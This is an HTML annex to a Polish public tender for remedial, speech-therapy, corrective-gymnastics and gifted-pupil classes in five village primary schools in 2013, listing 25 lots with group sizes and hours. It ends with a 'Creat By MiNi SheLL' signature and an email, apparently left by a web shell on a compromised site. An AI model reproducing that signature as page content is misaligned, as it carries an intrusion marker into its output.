<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część 1. (równoważna z cz.2)
<br />Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Miejsce prowadzenia zajęć: Szkoła Podstawowa w Sobianowicach. Dwie grupy po 3 dzieci. Łącznie 60 godzin (30+30)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> <br />Część 2. (równoważna z cz.1)
<br />Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Miejsce prowadzenia zajęć: Szkoła Podstawowa w Sobianowicach. Dwie grupy od 3 do 4 dzieci. Łącznie 60 godzin (30+30)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> <br />Część 3. (równoważna z cz.4)
<br />Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Miejsce prowadzenia zajęć: Szkoła Podstawowa w Pliszczynie. Dwie grupy po 4 dzieci. Łącznie 60 godzin (30+30)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> <br />Część 4. (równoważna z cz.3)
<br />Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Miejsce prowadzenia zajęć: Szkoła Podstawowa w Pliszczynie. Dwie grupy po 4 dzieci. Łącznie 60 godzin (30+30)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> <br />Część 5.
<br />Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Miejsce prowadzenia zajęć: Szkoła Podstawowa w Pliszczynie. Jedna grupa -4 dzieci. Łącznie 30 godzin..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> <br />Część 6.
<br />Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Miejsce prowadzenia zajęć: Szkoła Podstawowa w Turce. Dwie grupy od 7 do 8 dzieci. Łącznie 72 godziny (36+36)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> <br />Część 7. (równoważna z cz.8 i cz.9)
<br />Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Miejsce prowadzenia zajęć: Szkoła Podstawowa w Świdniku Małym. Jedna grupa -3 dzieci. Łącznie 36 godzin..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> <br />Część 8. (równoważna z cz.7 i cz.9)
<br />Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Miejsce prowadzenia zajęć: Szkoła Podstawowa w Świdniku Małym. Jedna grupa -5 dzieci. Łącznie 36 godzin..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> <br />Część 9. (równoważna z cz.7 i cz.8)
<br />Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Miejsce prowadzenia zajęć: Szkoła Podstawowa w Świdniku Małym. Jedna grupa -3 dzieci. Łącznie 36 godzin..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> <br />Część 10.
<br />Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Miejsce prowadzenia zajęć: Szkoła Podstawowa w Łuszczowie. Cztery  grupy od 4 do 5 dzieci. Łącznie 130 godzin (40+30+30+30)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> <br />Część 11.
<br />Zajęcia logopedyczne dla dzieci z zaburzeniami mowy..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Miejsce prowadzenia zajęć: Szkoła Podstawowa w Sobianowicach. Cztery  grupy od 3 do 4 dzieci. Łącznie 120 godzin (30+30+30+30)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> <br />Część 12.
<br />Zajęcia logopedyczne dla dzieci z zaburzeniami mowy..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Miejsce prowadzenia zajęć: Szkoła Podstawowa w Pliszczynie. Pięć  grup od 3 do 4 dzieci. Łącznie 150 godzin (30+30+30+30+30)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> <br />Część 13.
<br />Zajęcia logopedyczne dla dzieci z zaburzeniami mowy..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Miejsce prowadzenia zajęć: Szkoła Podstawowa w Turce. Trzy grupy od 2 do 5 dzieci. Łącznie 120 godzin (40+40+40)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> <br />Część 14.
<br />Zajęcia logopedyczne dla dzieci z zaburzeniami mowy..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Miejsce prowadzenia zajęć: Szkoła Podstawowa w Świdniku Małym. Dwie grupy po 3 dzieci. Łącznie 72 godziny (36+36)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> <br />Część 15.
<br />Zajęcia logopedyczne dla dzieci z zaburzeniami mowy..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Miejsce prowadzenia zajęć: Szkoła Podstawowa w Łuszczowie. Trzy grupy od 3 do 4 dzieci. Łącznie 130 godzin (40+45+45)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> <br />Część 16.
<br />Gimnastyka korekcyjna dla dzieci z wadami postawy..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Miejsce prowadzenia zajęć: Szkoła Podstawowa w Sobianowicach. Cztery  grupy od 4 do 5 dzieci. Łącznie 120 godzin (30+30+30+30)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> <br />Część 17.
<br />Gimnastyka korekcyjna dla dzieci z wadami postawy..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Miejsce prowadzenia zajęć: Szkoła Podstawowa w Pliszczynie. Jedna  grupa - 3 dzieci. Łącznie 30 godzin..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 18 <b>NAZWA:</b> <br />Część 18 (równoważna z cz.19).
<br />Gimnastyka korekcyjna dla dzieci z wadami postawy..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Miejsce prowadzenia zajęć: Szkoła Podstawowa w Pliszczynie. Dwie grupy po 3 dzieci. Łącznie 60 godzin (30+30)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 19 <b>NAZWA:</b> <br />Część 19 (równoważna z cz.18).
<br />Gimnastyka korekcyjna dla dzieci z wadami postawy..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Miejsce prowadzenia zajęć: Szkoła Podstawowa w Pliszczynie. Dwie grupy po 4 dzieci. Łącznie 60 godzin (30+30)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 20 <b>NAZWA:</b> <br />Część 20.
<br />Gimnastyka korekcyjna dla dzieci z wadami postawy..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Miejsce prowadzenia zajęć: Szkoła Podstawowa w Turce. Trzy grupy od 6 do 10 dzieci. Łącznie 108 godzin (48+30+30)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 21 <b>NAZWA:</b> <br />Część 21.
<br />Gimnastyka korekcyjna dla dzieci z wadami postawy..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Miejsce prowadzenia zajęć: Szkoła Podstawowa w Świdniku Małym. Trzy grupy po 8 dzieci. Łącznie 72 godziny (24+24+24)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 22 <b>NAZWA:</b> <br />Część 22.
<br />Gimnastyka korekcyjna dla dzieci z wadami postawy..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Miejsce prowadzenia zajęć: Szkoła Podstawowa w Łuszczowie. Cztery  grupy od 5 do 8 dzieci. Łącznie 130 godzin (30+30+30+40)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 23 <b>NAZWA:</b> <br />Część 23.
<br />Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych ze szczególnym uwzględnieniem nauk matematyczno - przyrodniczych..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Miejsce prowadzenia zajęć: Szkoła Podstawowa w Sobianowicach. Jedna  grupa - 9 dzieci. Łącznie 30 godzin..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 24 <b>NAZWA:</b> <br />Część 24 (równoważna z cz.25).
<br />Zajęcia gimnastyki korekcyjnej na basenie..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Miejsce prowadzenia zajęć: kolejno każda szkoła odpowiednio dla każdej grupy  - miejscem rozpoczęcia i zakończenia zajęć jest szkoła, z której zapewniony jest przez zamawiającego transport na basen. Cztery grupy od 9 do 12 dzieci. Łącznie 50 godzin (10+10+10+10+10)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 25 <b>NAZWA:</b> <br />Część 25 (równoważna z cz.24).
<br />Zajęcia gimnastyki korekcyjnej na basenie..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Miejsce prowadzenia zajęć: kolejno każda szkoła odpowiednio dla każdej grupy (Sobianowice, Turka, Pliszczyn, Świdnik Mały, Łuszczów)  - miejscem rozpoczęcia i zakończenia zajęć jest szkoła, z której zapewniony jest przez zamawiającego transport na basen. Cztery grupy od 9 do 12 dzieci. Łącznie 50 godzin (10+10+10+10+10).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com